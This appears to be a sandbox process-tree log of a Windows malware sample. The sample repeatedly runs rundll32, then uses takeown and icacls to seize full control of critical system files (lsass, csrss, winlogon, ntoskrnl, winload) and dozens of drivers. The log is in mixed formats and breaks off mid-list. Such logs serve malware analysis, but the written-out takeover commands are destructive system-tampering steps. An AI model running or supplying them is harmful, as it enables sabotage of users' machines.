-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2952
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3008
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2516
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2700
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2432
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2488
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:528
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1532
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:268
-
-
-
[2] C:\Windows\System32\cmd.exe (PID:1732): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2832): takeown /f C:\Windows\System32\smss.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:2132): icacls C:\Windows\System32\smss.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:1008): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:1972): takeown /f C:\Windows\System32\csrss.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:3032): icacls C:\Windows\System32\csrss.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2252): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:1468): takeown /f C:\Windows\System32\wininit.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:1012): icacls C:\Windows\System32\wininit.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2748): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:936): takeown /f C:\Windows\System32\LogonUI.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:1032): icacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:1708): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2012): takeown /f C:\Windows\System32\lsass.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:1892): icacls C:\Windows\System32\lsass.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3052): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2560): takeown /f C:\Windows\System32\services.exe
        - Possible privilege escalation attempt
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:2604): icacls C:\Windows\System32\services.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:1236): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2876): takeown /f C:\Windows\System32\winlogon.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:2620): icacls C:\Windows\System32\winlogon.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2864): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2136): takeown /f C:\Windows\System32\winload.efi
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:2444): icacls C:\Windows\System32\winload.efi /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2256): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2924): takeown /f C:\Windows\System32\winload.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:2888): icacls C:\Windows\System32\winload.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:1588): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2480): takeown /f C:\Windows\System32\ntoskrnl.exe
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:592): icacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2684): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2224): takeown /f C:\Windows\System32\svchost.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:1428): icacls C:\Windows\System32\svchost.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2552): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2364): takeown /f C:\Windows\SysWOW64\smss.exe
        - Possible privilege escalation attempt
        - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe (PID:1748): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2116): takeown /f C:\Windows\SysWOW64\csrss.exe
        - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe (PID:2860): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:704): takeown /f C:\Windows\SysWOW64\wininit.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:2588): icacls C:\Windows\SysWOW64\wininit.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:1452): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2124): takeown /f C:\Windows\SysWOW64\LogonUI.exe
        - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe (PID:1668): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2932): takeown /f C:\Windows\SysWOW64\lsass.exe
        - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe (PID:1468): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2796): takeown /f C:\Windows\SysWOW64\services.exe
        - Possible privilege escalation attempt
        - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe (PID:2948): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:1900): takeown /f C:\Windows\SysWOW64\winlogon.exe
        - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe (PID:1824): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:564): takeown /f C:\Windows\SysWOW64\winload.efi
        - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe (PID:2924): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2596): takeown /f C:\Windows\SysWOW64\winload.exe
        - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe (PID:568): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2364): takeown /f C:\Windows\SysWOW64\ntoskrnl.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:1444): icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2780): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2604): takeown /f C:\Windows\SysWOW64\svchost.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:552): icacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:1140): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:552): takeown /f C:\Windows\System32\drivers\1394bus.sys
    [3] C:\Windows\system32\icacls.exe (PID:2464): icacls C:\Windows\System32\drivers\1394bus.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2456): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2796): takeown /f C:\Windows\System32\drivers\1394ohci.sys
    [3] C:\Windows\system32\icacls.exe (PID:2988): icacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3032): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:772): takeown /f C:\Windows\System32\drivers\acpi.sys
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:3080): icacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2124): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2692): takeown /f C:\Windows\System32\drivers\acpipmi.sys
    [3] C:\Windows\system32\icacls.exe (PID:2988): icacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:1788): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3092): takeown /f C:\Windows\System32\drivers\adp94xx.sys
    [3] C:\Windows\system32\icacls.exe (PID:3136): icacls C:\Windows\System32\drivers\adp94xx.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2224): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3100): takeown /f C:\Windows\System32\drivers\adpahci.sys
        - Possible privilege escalation attempt
    [3] C:\Windows\system32\icacls.exe (PID:3120): icacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2492): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3172): takeown /f C:\Windows\System32\drivers\adpu320.sys
    [3] C:\Windows\system32\icacls.exe (PID:3188): icacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2604): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3212): takeown /f C:\Windows\System32\drivers\afd.sys
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:3280): icacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:2692): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3240): takeown /f C:\Windows\System32\drivers\agilevpn.sys
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:3308): icacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3156): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3272): takeown /f C:\Windows\System32\drivers\AGP440.sys
    [3] C:\Windows\system32\icacls.exe (PID:3324): icacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3204): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3360): takeown /f C:\Windows\System32\drivers\aliide.sys
    [3] C:\Windows\system32\icacls.exe (PID:3416): icacls C:\Windows\System32\drivers\aliide.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3252): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3368): takeown /f C:\Windows\System32\drivers\amdide.sys
    [3] C:\Windows\system32\icacls.exe (PID:3424): icacls C:\Windows\System32\drivers\amdide.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3316): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3448): takeown /f C:\Windows\System32\drivers\amdk8.sys
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID:3488): icacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"
        - Modifies file permissions
[2] C:\Windows\System32\cmd.exe (PID:3376): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3496): takeown /f C:\Windows\System32\drivers\amdppm.sys
    [3] C:\Windows\system32\icacls.exe (PID:3560): icacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3400): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3504): takeown /f C:\Windows\System32\drivers\amdsata.sys
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID:3552): icacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3456): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3580): takeown /f C:\Windows\System32\drivers\amdsbs.sys
    [3] C:\Windows\system32\icacls.exe (PID:3616): icacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3520): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3632): takeown /f C:\Windows\System32\drivers\amdxata.sys
        - Possible privilege escalation attempt
    [3] C:\Windows\system32\icacls.exe (PID:3676): icacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3544): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3692): takeown /f C:\Windows\System32\drivers\appid.sys
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:3744): icacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3608): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3784): takeown /f C:\Windows\System32\drivers\arc.sys
    [3] C:\Windows\system32\icacls.exe (PID:3816): icacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3644): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3736): takeown /f C:\Windows\System32\drivers\arcsas.sys
    [3] C:\Windows\system32\icacls.exe (PID:3768): icacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"
        - Possible privilege escalation attempt
[2] C:\Windows\System32\cmd.exe (PID:3684): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3760): takeown /f C:\Windows\System32\drivers\asyncmac.sys
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:3836): icacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"
        - Possible privilege escalation attempt
[2] C:\Windows\System32\cmd.exe (PID:3776): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3900): takeown /f C:\Windows\System32\drivers\atapi.sys
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:3976): icacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3808): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3892): takeown /f C:\Windows\System32\drivers\ataport.sys
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:3944): icacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3860): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:3996): takeown /f C:\Windows\System32\drivers\b57nd60a.sys
    [3] C:\Windows\system32\icacls.exe (PID:4036): icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3912): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:4012): takeown /f C:\Windows\System32\drivers\battc.sys
    [3] C:\Windows\system32\icacls.exe (PID:564): icacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:3952): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2968): takeown /f C:\Windows\System32\drivers\beep.sys
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID:3112): icacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:4004): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bg4ldl2nv9195q.sys && icacls C:\Windows\System32\drivers\bg4ldl2nv9195q.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:4088): takeown /f C:\Windows\System32\drivers\bg4ldl2nv9195q.sys
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID:3100): icacls C:\Windows\System32\drivers\bg4ldl2nv9195q.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:4044): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit
    [3] C:\Windows\system32\takeown.exe (PID:2292): takeown /f C:\Windows\System32\drivers\blbdrive.sys
    [3] C:\Windows\system32\icacls.exe (PID:2560): icacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"
[2] C:\Windows\System32\cmd.exe (PID:4080): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bowser.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3228
-
-
-
  C:\Windows\System32\cmd.exe (PID:2244): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3188): takeown /f C:\Windows\System32\drivers\BrFiltLo.sys
    C:\Windows\system32\icacls.exe (PID:3212): icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "Admin:F"  [Possible privilege escalation attempt]

  C:\Windows\System32\cmd.exe (PID:704): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3300): takeown /f C:\Windows\System32\drivers\BrFiltUp.sys
    C:\Windows\system32\icacls.exe (PID:3348): icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3116): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3244): takeown /f C:\Windows\System32\drivers\bridge.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3352): icacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:2364): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:2272): takeown /f C:\Windows\System32\drivers\BrSerId.sys  [Possible privilege escalation attempt]
    C:\Windows\system32\icacls.exe (PID:3248): icacls C:\Windows\System32\drivers\BrSerId.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:2444): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3428): takeown /f C:\Windows\System32\drivers\BrSerWdm.sys
    C:\Windows\system32\icacls.exe (PID:3220): icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:2656): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3512): takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys  [Modifies file permissions]
    C:\Windows\system32\icacls.exe (PID:3484): icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"  [Modifies file permissions]

  C:\Windows\System32\cmd.exe (PID:3364): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3604): takeown /f C:\Windows\System32\drivers\BrUsbSer.sys
    C:\Windows\system32\icacls.exe (PID:3528): icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3412): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3496): takeown /f C:\Windows\System32\drivers\bthmodem.sys
    C:\Windows\system32\icacls.exe (PID:3392): icacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3264): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3576): takeown /f C:\Windows\System32\drivers\bxvbda.sys
